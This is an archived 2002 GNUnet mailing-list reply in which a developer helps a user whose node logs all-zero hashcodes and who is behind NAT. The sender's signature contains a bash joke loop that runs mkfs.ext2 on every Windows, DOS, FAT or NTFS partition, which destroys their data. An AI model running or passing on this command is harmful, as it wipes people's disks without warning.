[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[GNUnet-developers] Re: [Help-gnunet] Help
From: |
Christian Grothoff |
Subject: |
[GNUnet-developers] Re: [Help-gnunet] Help |
Date: |
Fri, 3 May 2002 10:57:20 -0500 |
On Friday 03 May 2002 05:26 am, you wrote:
> I can't reach anything. I don't think my requests are even getting beyond
> my node.
Somebody has reported this very strange '000000000000000' hash before, I was
never able to reproduce it. Can you give me OS/openssl-version/gcc-version
and whatever else may be interesting about your system? A hashcode with
all-zeros is very very strange.
You mention that you are behind a NAT box. You are aware that you have to
configure your NAT box for UDP port forwarding and specify the IP of the NAT
box in the gnunet.conf file? GNUnet is using UDP (right now, TCP will be
supported in the future), something that most NAT boxes are not very happy
with, so they usually must be configured a bit more. Either way, the all-zero
bug is probably something else.
thanks for reporting!
Christian
> This is what I do:
>
> ./gnunetd &
>
> ./gnunet-search test
>
> On the console I get this:
>
> Indexing data/content database... Done.
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> SKEY rejected from host 4ECE5254B05AED27EE06EB2FC19BE8F4520CB1C1 (address
> 192.168. 0. 2: 2086): key.len = 49152
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
> addHost: lookForHost for 0000000000000000000000000000000000000000 returned
> NULL!
> unicast failed, host unknown!
>
> I am behind NAT, but that's never stopped anything apart from incoming
> stuff. Could that be a problem? Also what is a good test to use? I have
> installed the list of initial hosts. Thanks,
>
> David
>
>
> _______________________________________________
> Help-gnunet mailing list
> address@hidden
> http://mail.gnu.org/mailman/listinfo/help-gnunet
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [GNUnet-developers] Re: [Help-gnunet] Help,
Christian Grothoff <=